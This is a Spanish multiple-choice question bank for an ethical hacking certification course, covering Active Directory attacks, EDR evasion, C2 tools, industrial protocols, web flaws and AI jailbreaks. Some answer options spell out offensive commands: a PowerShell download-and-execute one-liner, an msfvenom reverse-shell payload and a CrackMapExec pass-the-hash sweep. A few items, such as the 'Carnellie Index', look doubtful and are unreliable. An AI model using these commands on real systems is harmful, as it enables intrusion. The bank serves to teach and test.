Anexo: Banco de Preguntas de Certificación 🎓

Este anexo contiene un banco de 100 preguntas de opción múltiple diseñadas para evaluar los conocimientos adquiridos en el curso de Ethical Hacking 2026. Las preguntas están organizadas en bloques de 10 para facilitar su estudio y revisión.

---

📦 Bloque 1: Fundamentos y Reconocimiento (1-10)

1. ¿Cuál es el propósito principal del uso de las flags -sV y -sC en un escaneo de Nmap?
   • Realizar un escaneo de puertos rápido ignorando servicios.
   • Detectar versiones de servicios y ejecutar scripts de enumeración estándar.
   • Ejecutar un ataque de denegación de servicio Slowloris.
   • Escanear únicamente puertos UDP.
2. En el modelo de responsabilidad compartida de la IA, ¿qué vulnerabilidad ocurre cuando un atacante manipula el comportamiento del LLM mediante instrucciones en lenguaje natural?
   • Inyección de SQL en la base de datos del modelo.
   • Ataque de denegación de servicio distribuido (DDoS).
   • Prompt Injection (Inyección de Prompt).
   • Envenenamiento de datos de entrenamiento (Data Poisoning).
3. ¿Cuál de las siguientes fases del pentesting según el estándar PTES se enfoca en la recolección de información y modelado de amenazas antes de la explotación?
   • Post-Explotación.
   • Intelligence Gathering.
   • Reporting.
   • Lateral Movement.
4. ¿Qué técnica permite extraer tickets TGS de la memoria para crackearlos offline y obtener contraseñas de cuentas de servicio en Active Directory?
   • Pass-the-Hash (PtH).
   • Kerberoasting.
   • Golden Ticket Attack.
   • AS-REP Roasting.
5. El parámetro “Temperatura” en un modelo de lenguaje (LLM) controla:
   • La velocidad de respuesta del servidor.
   • La aleatoriedad y creatividad de las respuestas generadas.
   • El número de tokens máximos por petición.
   • El nivel de cifrado de la conexión TLS.
6. ¿Qué protocolo de seguridad en redes Zero Trust exige que tanto el cliente como el servidor presenten certificados válidos para establecer la conexión?
   • HTTP con cifrado AES-256.
   • mTLS (Mutual Transport Layer Security).
   • Wireguard VPN.
   • DNS Tunneling.
7. ¿Cuál es el comando de Gobuster más eficiente para descubrir subdominios de forma activa utilizando un diccionario?
   • gobuster dns -d dominio.com -w subdomains.txt
   • subfinder -d dominio.com
   • nmap --script dns-brute dominio.com
   • masscan -p53 dominio.com
8. La vulnerabilidad BOLA (Broken Object Level Authorization) en APIs se caracteriza por:
   • El uso de algoritmos de cifrado débiles en JWT.
   • La falta de validación de que el usuario tiene permiso para acceder a un ID específico de recurso.
   • La ejecución de comandos del sistema operativo a través de la API.
   • La ausencia de límites de velocidad (Rate Limiting).
9. ¿Qué ataque permite a un adversario interactuar con servicios internos de una red de nube a través de un servidor vulnerable, a menudo para exfiltrar metadatos de instancias?
   • Cross-Site Scripting (XSS).
   • Server-Side Request Forgery (SSRF).
   • Inyección de Comandos del SO.
   • Inyección SQL de segundo orden.
10. ¿Cuál es la técnica de evasión que consiste en sobreescribir las instrucciones de la librería amsi.dll en memoria para deshabilitar el escaneo de scripts?
    • Modificar el registro para desactivar Windows Defender.
    • Memory Patching de la función AmsiScanBuffer.
    • Renombrar el binario de PowerShell.
    • Cifrar el script malicioso con BitLocker.

---

📦 Bloque 2: Infraestructura y Sistemas (11-20)

11. En el Modelo Purdue de seguridad industrial, ¿en qué nivel se encuentran típicamente los PLCs y controladores de procesos físicos?
    • Nivel 4 (Red Corporativa).
    • Nivel 3 (DMZ Industrial).
    • Nivel 1 (Control Básico).
    • Nivel 5 (Internet).
12. ¿Qué protocolo industrial transmite datos en texto plano y carece de autenticación nativa, permitiendo la manipulación directa de PLCs?
    • HTTPS con TLS 1.3.
    • Modbus TCP.
    • SSH (Secure Shell).
    • MQTT con certificados.
13. ¿Cuál es el archivo en sistemas Linux que contiene los hashes de las contraseñas y solo es legible por el usuario root?
    • /etc/passwd
    • /etc/shadow
    • /var/log/auth.log
    • /root/.bash_history
14. ¿Cuál de los siguientes es un “LOLBin” utilizado frecuentemente para descargar archivos maliciosos evadiendo detecciones de red?
    • whoami.exe
    • certutil.exe
    • notepad.exe
    • calc.exe
15. ¿Qué módulo de Burp Suite es el más adecuado para realizar un ataque de fuerza bruta automatizado contra un formulario de login?
    • Decoder.
    • Repeater.
    • Intruder.
    • Proxy.
16. El ataque DCSync se aprovecha de una característica legítima de Active Directory para:
    • Ejecutar código remoto en el Controlador de Dominio.
    • Simular la replicación de datos para extraer hashes de contraseñas de cualquier usuario.
    • Realizar un ataque de denegación de servicio al DNS.
    • Escalar privilegios mediante vulnerabilidades del kernel.
17. ¿Qué componente de Metasploit se encarga de esperar y gestionar la conexión entrante desde una víctima comprometida?
    • auxiliary/scanner
    • exploit/multi/handler
    • payload/windows/x64/meterpreter
    • post/multi/gather
18. ¿Qué técnica de persistencia en Windows utiliza las llaves del Registro para ejecutar un binario cada vez que el usuario inicia sesión?
    • Scheduled Tasks.
    • Run Keys (HKCU\…\Run).
    • WMI Event Subscription.
    • DLL Sideloading.
19. La “extracción de datos de entrenamiento” en LLMs es un riesgo de privacidad que ocurre cuando:
    • El modelo es robado mediante ingeniería inversa.
    • El modelo memoriza y revela información sensible (PII) presente en su dataset original.
    • El atacante inyecta datos maliciosos durante el fine-tuning.
    • El usuario agota los tokens del sistema mediante ataques de DoS.
20. ¿Cuál es la técnica de post-explotación en Linux que busca archivos con permisos especiales para ejecutar comandos con privilegios de propietario?
    • Enumeración de procesos.
    • Búsqueda de binarios con el bit SUID activo.
    • Análisis de logs de Apache.
    • Revisión del historial de comandos .bash_history.

---

📦 Bloque 3: Técnicas de Ataque y Herramientas (21-30)

21. ¿Qué herramienta destaca por orquestar múltiples escaneos (Nmap, Nikto, Feroxbuster) en paralelo basándose en los puertos abiertos detectados?
    • Microsoft Excel.
    • AutoRecon.
    • Wireshark.
    • Hashcat.
22. ¿Qué ataque de Active Directory permite suplantar cualquier identidad en el dominio por un periodo extendido (hasta 10 años) tras comprometer la cuenta krbtgt?
    • Silver Ticket.
    • Golden Ticket.
    • Diamond Ticket.
    • Skeleton Key.
23. El concepto de “Jailbreaking” en IA se refiere a:
    • Escalar privilegios en el sistema operativo que aloja el modelo.
    • El uso de ingeniería social y prompts complejos para evadir los filtros de seguridad del modelo.
    • Realizar un ataque de desbordamiento de búfer en la API del LLM.
    • Interceptar el tráfico cifrado entre el cliente y la IA.
24. ¿Cuál es el puerto estándar utilizado por el protocolo Kerberos para la autenticación en un dominio de Windows?
    • 445 (SMB)
    • 389 (LDAP)
    • 88 (TCP/UDP)
    • 636 (LDAPS)
25. ¿Qué técnica de evasión avanzada consiste en cargar una DLL limpia desde el disco para sobreescribir los hooks del EDR en memoria?
    • DLL Hijacking.
    • DLL Unhooking.
    • Process Hollowing.
    • Reflective Loading.
26. El estándar PTES define una fase de “Pre-engagement Interactions” para:
    • Realizar el primer escaneo de puertos.
    • Establecer el alcance, las reglas de compromiso y los límites legales del pentest.
    • Entregar el reporte final al cliente.
    • Realizar el escalamiento de privilegios.
27. ¿Qué metodología de pentesting es conocida por su enfoque científico y el uso del “Carnellie Index” para medir la seguridad?
    • PTES.
    • OSSTMM.
    • OWASP.
    • NIST SP 800-115.
28. ¿Cuál es el comando de Nmap para realizar un escaneo UDP rápido de los puertos más comunes?
    • nmap -sS target
    • nmap -sU -F target
    • nmap -p- target
    • nmap -sT target
29. En OSINT, ¿qué herramienta se utiliza principalmente para buscar subdominios, correos electrónicos y nombres de usuarios en múltiples fuentes públicas?
    • Nmap.
    • theHarvester.
    • Wireshark.
    • Metasploit.
30. ¿Qué vulnerabilidad de la lista OWASP LLM 2025 se refiere al uso de plugins con permisos excesivos por parte de un agente de IA?
    • LLM01: Prompt Injection.
    • LLM03: Data Poisoning.
    • LLM08: Excessive Agency.
    • LLM06: Sensitive Info Disclosure.

---

📦 Bloque 4: Explotación Web y Modelos IA (31-40)

31. La técnica “DAN” (Do Anything Now) es un ejemplo clásico de:
    • Inyección SQL en aplicaciones web.
    • Jailbreak por personificación en modelos de IA.
    • Escalamiento de privilegios en sistemas Linux.
    • Ataque de denegación de servicio a APIs.
32. ¿Qué flag de Nmap permite evadir un firewall mediante la fragmentación de paquetes?
    • -sV
    • -f
    • -T4
    • -p-
33. En el ataque de Inyección SQL basada en tiempo (Time-Based Blind SQLi), ¿cómo sabe el atacante que una condición es verdadera?
    • Por el mensaje de error detallado en la página.
    • Por el cambio en el tamaño del contenido HTML devuelto.
    • Por el retraso notable en el tiempo de respuesta del servidor (ej. 5 segundos).
    • Porque la sesión del usuario se cierra automáticamente.
34. ¿Cuál es la principal diferencia entre un Pentest de “Caja Negra” y uno de “Caja Blanca”?

• La caja negra incluye ataques físicos y la blanca no.
• En caja negra no se tiene información previa del objetivo, mientras que en caja blanca se dispone de diagramas, código y accesos.
• La caja blanca es solo para aplicaciones web y la negra para redes.
• La caja negra es más rápida de ejecutar que la caja blanca.

35. ¿Qué herramienta se especializa en el análisis visual de relaciones entre entidades (IPs, dominios, personas) mediante grafos?
    • Shodan.
    • Maltego.
    • SQLmap.
    • Hydra.
36. ¿Qué vulnerabilidad ocurre cuando una aplicación web permite a un usuario subir archivos maliciosos que se ejecutan en el servidor?
    • Inyección SQL.
    • Unrestricted File Upload.
    • Cross-Site Request Forgery (CSRF).
    • Clickjacking.
37. ¿Cuál de las siguientes es una técnica de “Lateral Movement” en redes Windows?
    • SQL Injection.
    • SMB Relay.
    • Prompt Injection.
    • DNS Tunneling.
38. ¿Qué protocolo industrial se utiliza comúnmente en plantas de energía y utiliza el puerto 20000?
    • Modbus TCP.
    • DNP3.
    • S7comm.
    • MQTT.
39. ¿Qué técnica de evasión consiste en iniciar un proceso legítimo (como svchost.exe) en estado suspendido para reemplazar su código por uno malicioso?
    • DLL Hijacking.
    • Process Hollowing.
    • Timestomping.
    • Obfuscation.
40. En el marco ético del pentesting, ¿qué significa “Divulgación Responsable”?
    • Publicar la vulnerabilidad en Twitter inmediatamente después de encontrarla.
    • Vender el exploit al mejor postor en la Dark Web.
    • Informar al fabricante o propietario del sistema y darle un tiempo razonable para corregir el fallo antes de publicarlo.
    • No informar a nadie para mantener la ventaja en el ataque.

---

📦 Bloque 5: Hardening y Redes (41-50)

41. ¿Qué herramienta automatizada de hardening se enfoca en sistemas industriales basados en Linux?
    • OpenPLC.
    • OpenClaw.
    • Pentagi.
    • Wireshark.
42. ¿Cuál es el comando de CrackMapExec para probar un hash NTLM contra un rango de red completo?
    • crackmapexec smb IP -u user -p pass
    • crackmapexec smb 10.10.10.0/24 -u user -H HASH
    • nmap -sC 10.10.10.0/24
    • metasploit -p smb_login
43. ¿Qué vulnerabilidad de API permite a un atacante enviar múltiples parámetros no esperados para modificar propiedades del sistema, como cambiar el rol de usuario a “admin”?
    • BOLA.
    • Mass Assignment (Asignación Masiva).
    • Inyección NoSQL.
    • Falta de cifrado en reposo.
44. ¿Cuál es el propósito del “Data Diode” en entornos industriales?
    • Actuar como un switch de alta velocidad para protocolos Modbus.
    • Permitir el flujo de datos en una sola dirección (típicamente de OT a IT), eliminando la bidireccionalidad del ataque.
    • Cifrar todas las comunicaciones entre PLCs.
    • Detectar intrusiones mediante análisis de firmas.
45. ¿Qué técnica de exfiltración utiliza peticiones DNS para enviar datos fuera de una red protegida por firewalls estrictos?
    • HTTP Exfiltration.
    • DNS Tunneling.
    • ICMP Redirect.
    • SMB Exfiltration.
46. ¿Qué vulnerabilidad OWASP se refiere a la presencia de componentes de software (librerías, frameworks) con fallos conocidos y no parcheados?
    • A01: Broken Access Control.
    • A06: Vulnerable and Outdated Components.
    • A09: Security Logging Failures.
    • A04: Insecure Design.
47. ¿Qué comando de PowerShell se utiliza para descargar y ejecutar un script directamente en memoria (Fileless execution)?
    • Invoke-Item script.ps1
    • IEX (New-Object Net.WebClient).DownloadString('URL')
    • Start-Process powershell.exe script.ps1
    • Copy-Item URL -Destination C:\
48. En el ataque “AS-REP Roasting”, ¿qué condición debe cumplir un usuario para ser vulnerable?
    • Debe ser miembro del grupo Administradores de Dominio.
    • Debe tener deshabilitada la “Pre-autenticación de Kerberos”.
    • Debe tener una contraseña de menos de 8 caracteres.
    • Debe haber iniciado sesión en un servidor comprometido.
49. ¿Qué herramienta de C2 (Command and Control) es moderna, está escrita en Go y utiliza mTLS para sus comunicaciones?
    • Metasploit.
    • Sliver.
    • Empire.
    • Netcat.
50. El ataque “Prompt Injection Indirecto” ocurre cuando:
    • El atacante escribe directamente en el chat de la IA.
    • La IA procesa una fuente externa (como una web o email) que contiene instrucciones maliciosas ocultas.
    • El modelo sufre un ataque de denegación de servicio.
    • El administrador cambia el System Prompt por error.

---

📦 Bloque 6: Pentesting Avanzado y C2 (51-60)

51. ¿Qué puerto utiliza típicamente el servicio de administración remota WinRM (HTTP)?
    • 3389
    • 22
    • 5985
    • 443
52. ¿Cuál es la principal función del framework “Sliver” en una operación de Red Team?
    • Escaneo de vulnerabilidades web.
    • Gestión de implantes y comando y control (C2) de máquinas comprometidas.
    • Análisis forense de memoria RAM.
    • Crackeo de contraseñas mediante GPU.
53. ¿Qué ataque de Active Directory permite suplantar cualquier servicio de un equipo específico usando el hash de la cuenta de computadora?
    • Silver Ticket.
    • Golden Ticket.
    • DCSync.
    • Kerberoasting.
54. La vulnerabilidad CSRF (Cross-Site Request Forgery) permite a un atacante:
    • Leer las cookies de sesión del usuario.
    • Forzar al navegador del usuario a realizar acciones no deseadas en una aplicación web donde está autenticado.
    • Inyectar código JavaScript en la base de datos.
    • Descifrar el tráfico HTTPS.
55. ¿Qué herramienta de “Defense Evasion” permite verificar qué partes de un payload son detectadas por Windows Defender?
    • msfvenom.
    • DefenderCheck.
    • UPX.
    • Burp Suite.
56. En el contexto de Active Directory, ¿qué es el “Pivoting”?
    • Cambiar la contraseña de un usuario mediante fuerza bruta.
    • Usar una máquina comprometida como puente para acceder a otras redes que no son accesibles directamente.
    • Escalar privilegios de usuario local a administrador.
    • Realizar un escaneo de puertos desde Internet.
57. ¿Qué ataque consiste en enviar peticiones HTTP maliciosas para que un servidor web realice peticiones en nombre del atacante hacia su propia infraestructura interna?
    • XSS.
    • SQLi.
    • SSRF.
    • LFI.
58. ¿Cuál es la puntuación máxima en el sistema CVSS v3.1 y qué severidad representa?
    • 5.0 (Media)
    • 7.5 (Alta)
    • 10.0 (Crítica)
    • 1.0 (Baja)
59. ¿Qué técnica de post-explotación permite modificar la fecha de creación y acceso de un archivo para confundir el análisis forense?
    • Obfuscation.
    • Timestomping.
    • Artifact Wiping.
    • Data Dumping.
60. El ataque “Golden Ticket” requiere el compromiso previo de:
    • El Administrador del Dominio.
    • El hash de la cuenta krbtgt.
    • La base de datos SQL del servidor.
    • El firewall perimetral.

---

📦 Bloque 7: Auditoría de APIs y Sistemas Industriales (61-70)

61. ¿Qué herramienta de escaneo web utiliza plantillas (templates) YAML para detectar vulnerabilidades específicas de forma rápida?
    • Nikto.
    • Nuclei.
    • SQLmap.
    • Dirb.
62. En una auditoría de API, ¿qué técnica se usa para descubrir todos los endpoints y tipos de datos de un servicio GraphQL?
    • Fuzzing de diccionarios.
    • Introspección (Introspection query).
    • Inyección SQL.
    • Análisis de logs.
63. ¿Cuál es el código de función de Modbus TCP utilizado comúnmente para leer registros de almacenamiento (Holding Registers)?
    • 01
    • 03
    • 05
    • 16
64. ¿Qué técnica de evasión de EDR consiste en inyectar código malicioso en el espacio de memoria de un proceso legítimo sin crear nuevos hilos?
    • DLL Hijacking.
    • Process Ghosting / Hollowing.
    • AMSI Bypass.
    • Timestomping.
65. ¿Qué es un “Agentic Pentest”?
    • Un pentest realizado por agentes humanos en sitio.
    • El uso de agentes de IA autónomos que planifican y ejecutan ataques de forma automática basándose en objetivos.
    • Un escaneo de vulnerabilidades que requiere un agente instalado en cada host.
    • Una auditoría de seguridad física de una oficina.
66. ¿Qué artículo del Código Penal español regula el acceso ilícito a sistemas informáticos (intrusión)?
    • Artículo 155.
    • Artículo 197 bis.
    • Artículo 264.
    • Artículo 500.
67. ¿Cuál es la función principal de la herramienta winPEAS?
    • Escanear puertos en Windows.
    • Enumerar automáticamente posibles vectores de escalada de privilegios en sistemas Windows.
    • Realizar ataques de denegación de servicio.
    • Descifrar hashes de Kerberos.
68. ¿Qué vulnerabilidad de IA ocurre cuando los datos utilizados para entrenar o re-entrenar el modelo contienen ejemplos maliciosos que alteran su comportamiento futuro?
    • Prompt Injection.
    • Training Data Poisoning.
    • Sensitive Info Disclosure.
    • Model Theft.
69. ¿Qué herramienta de C2 destaca por su interfaz visual moderna y el uso de “Beacons” similares a Cobalt Strike?
    • Sliver.
    • Havoc.
    • Metasploit.
    • PoshC2.
70. ¿Cuál de las siguientes es una técnica “Antiforense” para ocultar la actividad en un sistema comprometido?
    • Ejecutar un escaneo de puertos.
    • Limpiar los registros de eventos de Windows (Event Logs).
    • Crear un nuevo usuario administrador.
    • Descargar herramientas desde GitHub.

---

📦 Bloque 8: Persistencia y Movimiento Lateral (71-80)

71. ¿Qué protocolo de red se utiliza para la sincronización de bases de datos de Active Directory y es abusado por el ataque DCSync?
    • SMB.
    • Kerberos.
    • DRSR (Directory Replication Service Remote Protocol).
    • LDAP.
72. En una evaluación de seguridad, el “Reporte Ejecutivo” debe estar orientado a:
    • Los administradores de sistemas y desarrolladores.
    • La alta dirección y tomadores de decisiones, enfocándose en riesgos de negocio.
    • Los auditores externos únicamente.
    • El equipo de respuesta a incidentes (Blue Team).
73. ¿Qué vulnerabilidad web permite a un atacante ejecutar código JavaScript en el navegador de otros usuarios de forma permanente?
    • Reflected XSS.
    • Stored XSS.
    • DOM-based XSS.
    • SQL Injection.
74. ¿Qué puerto utiliza el servicio LDAP por defecto?
    • 636
    • 389
    • 3268
    • 445
75. ¿Qué herramienta se utiliza para el movimiento lateral mediante la ejecución remota de comandos vía WMI?
    • psexec.py
    • wmiexec.py
    • smbexec.py
    • secretsdump.py
76. ¿Qué es el “Credential Sandboxing” en el contexto de defensa de AD?
    • Ejecutar aplicaciones en un entorno aislado.
    • Limitar dónde y cómo se pueden usar las credenciales de alta jerarquía para evitar que queden en memoria de equipos inseguros.
    • Cifrar las contraseñas con un algoritmo de caja de arena.
    • Bloquear el acceso a Internet de los administradores.
77. ¿Qué técnica de evasión de AV/EDR utiliza el bit de “suspendido” en la creación de procesos para inyectar shellcode?
    • Reflective DLL Injection.
    • Process Hollowing.
    • Atom Bombing.
    • DLL Proxying.
78. ¿Cuál es el propósito del “Principio de Menor Privilegio”?
    • Dar a todos los usuarios acceso total para evitar bloqueos de trabajo.
    • Otorgar a cada usuario y proceso solo los permisos mínimos necesarios para realizar su función.
    • Asegurar que el administrador tenga la contraseña más corta.
    • Bloquear el acceso a todos los usuarios por defecto.
79. ¿Qué vulnerabilidad permite a un atacante leer archivos locales del servidor web, como /etc/passwd, a través de una aplicación web mal programada?
    • SQLi.
    • XSS.
    • LFI (Local File Inclusion).
    • CSRF.
80. ¿Cuál es la principal diferencia entre un “Virus” y un “Gusano” (Worm)?
    • El virus es más peligroso que el gusano.
    • El virus requiere intervención humana para propagarse (ej. ejecutar un archivo), mientras que el gusano se propaga automáticamente por la red.
    • El gusano solo afecta a sistemas Linux.
    • El virus se oculta en el sector de arranque y el gusano no.

---

📦 Bloque 9: Explotación y Evasión (81-90)

81. ¿Qué herramienta se utiliza para interceptar y modificar peticiones HTTP/S entre el navegador y el servidor?
    • Wireshark.
    • Burp Suite.
    • Nmap.
    • Metasploit.
82. ¿Qué ataque de Active Directory se basa en solicitar un ticket de autenticación (TGT) y crackearlo offline sin interactuar con el Domain Controller después de la solicitud inicial?
    • Kerberoasting.
    • AS-REP Roasting.
    • Pass-the-Hash.
    • Golden Ticket.
83. ¿Cuál es el comando de msfvenom para generar un payload de Meterpreter reversa para Windows en formato ejecutable?
    • msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf -o out
    • msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe -o payload.exe
    • msfvenom -a x86 --platform windows -p reverse_tcp -f exe
    • msfvenom -p windows/shell_reverse_tcp -f raw
84. ¿Qué técnica de evasión utiliza codificaciones como Base64 o Hex para ocultar comandos maliciosos en scripts de PowerShell?
    • Encryption.
    • Obfuscation (Ofuscación).
    • Packing.
    • Timestomping.
85. ¿Qué es Shodan?
    • Una herramienta para crackear contraseñas de WiFi.
    • Un motor de búsqueda para dispositivos conectados a Internet (IoT, servidores, bases de datos).
    • Un framework de explotación para sistemas Android.
    • Un antivirus de próxima generación.
86. ¿Qué vulnerabilidad de API ocurre cuando el servidor devuelve más información de la necesaria en la respuesta JSON, confiando en que el cliente la filtrará?
    • BOLA.
    • Excessive Data Exposure (Exposición Excesiva de Datos).
    • Mass Assignment.
    • Inyección de encabezados.
87. ¿Qué protocolo industrial de Siemens utiliza el puerto 102?
    • Modbus TCP.
    • S7comm.
    • EtherNet/IP.
    • BACnet.
88. En Active Directory, ¿qué es un “Service Principal Name” (SPN)?
    • El nombre del administrador del dominio.
    • Un identificador único que vincula un servicio con una cuenta de usuario o equipo en AD.
    • La dirección IP del Domain Controller.
    • Un tipo de ticket de Kerberos cifrado con AES.
89. ¿Qué herramienta de pentesting de Active Directory permite visualizar rutas de ataque complejas mediante teoría de grafos?
    • Rubeus.
    • BloodHound.
    • PowerView.
    • Mimikatz.
90. ¿Cuál es la función del comando sudo -l en Linux?
    • Cambiar la contraseña del usuario actual.
    • Listar los privilegios permitidos para el usuario actual mediante el comando sudo.
    • Eliminar todos los archivos temporales.
    • Ver los puertos abiertos en el sistema.

---

📦 Bloque 10: Ética, IA y Reporte (91-100)

91. ¿Qué vulnerabilidad de la lista OWASP Top 10 2025 se refiere a la falta de mecanismos para detectar y responder a brechas de seguridad de forma oportuna?
    • A01: Broken Access Control.
    • A05: Security Misconfiguration.
    • A09: Security Logging and Monitoring Failures.
    • A10: Server-Side Request Forgery.
92. ¿Qué técnica permite ejecutar código malicioso en el contexto de un proceso de navegador web mediante la manipulación del DOM?
    • Reflected XSS.
    • DOM-based XSS.
    • SQLi.
    • CSRF.
93. ¿Cuál es el propósito de un “Honeypot” en una red corporativa?
    • Acelerar la conexión a Internet de los empleados.
    • Actuar como una trampa para detectar, desviar o estudiar intentos de uso no autorizado de los sistemas.
    • Almacenar copias de seguridad de las bases de datos.
    • Filtrar el spam de los correos electrónicos.
94. ¿Qué ataque de denegación de servicio (DoS) contra LLMs consiste en enviar inputs diseñados para forzar el máximo consumo de tokens y capacidad de procesamiento?
    • Prompt Injection.
    • Model Denial of Service.
    • Training Data Poisoning.
    • Model Theft.
95. ¿Qué herramienta se utiliza para auditar la seguridad de las configuraciones de Azure AD / Entra ID?
    • Nmap.
    • AADInternals / ROADtools.
    • Metasploit.
    • SQLmap.
96. ¿Qué es el “Pivoting” mediante SSH Tunneling (Local Forwarding)?
    • Usar SSH para cifrar el disco duro.
    • Redirigir un puerto de la máquina atacante a través del servidor SSH hacia un puerto en la red interna de la víctima.
    • Escalar privilegios a root en el servidor SSH.
    • Realizar un ataque de fuerza bruta contra el servicio SSH.
97. ¿Cuál de los siguientes es un marco legal europeo que obliga a las empresas a proteger los datos personales y notificar brechas en 72 horas?
    • NIST.
    • GDPR (RGPD).
    • PCI-DSS.
    • HIPAA.
98. ¿Qué técnica de evasión de antivirus utiliza algoritmos polimórficos para cambiar la firma del malware en cada ejecución?
    • UPX Packing.
    • Shikata-Ga-Nai (u otros encoders polimórficos).
    • Timestomping.
    • Obfuscation manual.
99. En un reporte de pentesting, el “Resumen Ejecutivo” debe evitar:
    • Mencionar los riesgos de negocio.
    • Usar lenguaje excesivamente técnico, líneas de comandos o código fuente detallado.
    • Indicar el alcance de la prueba.
    • Proponer recomendaciones generales de seguridad.
100. ¿Cuál es la regla de oro número uno de un Pentester ético? - [ ] Ser el más rápido encontrando vulnerabilidades. - [ ] Usar las herramientas más caras del mercado. - [X] Nunca realizar ninguna prueba de seguridad sin una autorización escrita y firmada por el propietario del sistema (Permiso para Atacar). - [ ] Ganar el máximo dinero posible en programas de Bug Bounty.